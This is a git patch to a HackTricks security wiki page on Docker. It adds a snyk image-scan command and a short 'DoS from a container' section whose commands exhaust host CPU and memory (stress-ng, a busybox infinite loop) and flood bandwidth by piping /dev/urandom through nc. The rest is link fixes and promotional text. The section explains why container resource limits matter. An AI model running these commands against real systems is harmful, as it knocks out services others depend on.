From cfc006dba665629429e803ab1adb0a08c8cb58c0 Mon Sep 17 00:00:00 2001 From: CPol Date: Tue, 8 Aug 2023 06:17:56 +0000 Subject: [PATCH] GITBOOK-4026: change request with no subject merged in GitBook --- .../docker-security/README.md | 26 +++++++++++++++++++ .../README.md | 18 +++++-------- 2 files changed, 33 insertions(+), 11 deletions(-) diff --git a/linux-hardening/privilege-escalation/docker-security/README.md b/linux-hardening/privilege-escalation/docker-security/README.md index d1393702f..5769ff4e7 100644 --- a/linux-hardening/privilege-escalation/docker-security/README.md +++ b/linux-hardening/privilege-escalation/docker-security/README.md @@ -83,6 +83,12 @@ Note that we do not currently have vulnerability data for your image. trivy -q -f json : ``` +* [**`snyk`**](https://docs.snyk.io/snyk-cli/getting-started-with-the-cli) + +```bash +snyk container test --json-file-output= --severity-threshold=high +``` + * [**`clair-scanner`**](https://github.com/arminc/clair-scanner) ```bash @@ -266,6 +272,26 @@ An authorization plugin **approves** or **denies** **requests** to the Docker ** [authz-and-authn-docker-access-authorization-plugin.md](authz-and-authn-docker-access-authorization-plugin.md) {% endcontent-ref %} +## DoS from a container + +If you are not properly limiting the resources a container can use, a compromised container could DoS the host where it's running. + +* CPU DoS + +```bash +# stress-ng +sudo apt-get install -y stress-ng && stress-ng --vm 1 --vm-bytes 1G --verify -t 5m + +# While loop +docker run -d --name malicious-container -c 512 busybox sh -c 'while true; do :; done' +``` + +* Bandwidth DoS + +```bash +nc -lvp 4444 >/dev/null & while true; do cat /dev/urandom | nc 4444; done +``` + ## Interesting Docker Flags ### --privileged flag diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md index de5ff088b..c8b39cafe 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). @@ -494,11 +494,7 @@ Like in the following examples: * [Writeup: How to contact Google SRE: Dropping a shell in cloud SQL](https://offensi.com/2020/08/18/how-to-contact-google-sre-dropping-a-shell-in-cloud-sql/) * [Metadata service MITM allows root privilege escalation (EKS / GKE)](https://blog.champtar.fr/Metadata\_MITM\_root\_EKS\_GKE/) -You will be able also to access **network services binded to localhost** inside the host or even access the **metadata permissions of the node** (which might be different those a container can access): - -{% content-ref url="../../docker-breakout/docker-breakout-privilege-escalation/broken-reference/" %} -[broken-reference](../../docker-breakout/docker-breakout-privilege-escalation/broken-reference/) -{% endcontent-ref %} +You will be able also to access **network services binded to localhost** inside the host or even access the **metadata permissions of the node** (which might be different those a container can access). ### hostIPC @@ -525,9 +521,8 @@ cat /proc/self/status | grep CapEff The second technique explained in the post [https://labs.f-secure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.f-secure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) indicates how you can abuse bind mounts with user namespaces, to affect files inside the host (in that specific case, delete files). -![](../../docker-breakout/.gitbook/assets/image%20\(9\)%20\(1\)%20\(2\).png) +![](<../../../../.gitbook/assets/image (9) (1) (2).png>) -\ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: @@ -668,9 +663,10 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new * [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket) * [https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4) -![](../../docker-breakout/.gitbook/assets/image%20\(9\)%20\(1\)%20\(2\).png) -\ + +![](<../../../../.gitbook/assets/image (9) (1) (2).png>) + Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: @@ -683,7 +679,7 @@ Get Access Today: * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).